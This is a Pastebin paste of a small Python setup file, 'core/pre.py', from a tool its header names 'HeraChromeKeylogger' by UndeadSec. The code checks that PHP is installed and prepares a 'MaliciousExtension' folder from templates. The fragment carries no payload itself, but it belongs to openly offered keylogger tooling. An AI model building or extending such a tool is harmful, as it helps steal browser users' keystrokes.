Advertisement
FlyFar

core/pre.py

Nov 19th, 2023
684
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.88 KB | Cybersecurity | 0 0
  1. ######################################################
  2. #                                                    #
  3. #       HeraChromeKeylogger                          #
  4. #                                                    #
  5. # by:     UNDEADSEC                                  #
  6. #                                                    #
  7. # Telegram Group: https://t.me/UndeadSec             #
  8. # YouTube Channel: https://youtube.com/c/UndeadSec   #
  9. # Twitter: https://twitter.com/A1S0N_                #
  10. #                                                    #
  11. ######################################################
  12. from os import system
  13.  
  14. def checkPHP():
  15.     if 256 != system('which php'):
  16.         return True        
  17.     else:
  18.         return False
  19.  
  20. def pre():
  21.     system('rm -rf MaliciousExtension')
  22.     system('mkdir MaliciousExtension')
  23.     system('cp Template/* MaliciousExtension/')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement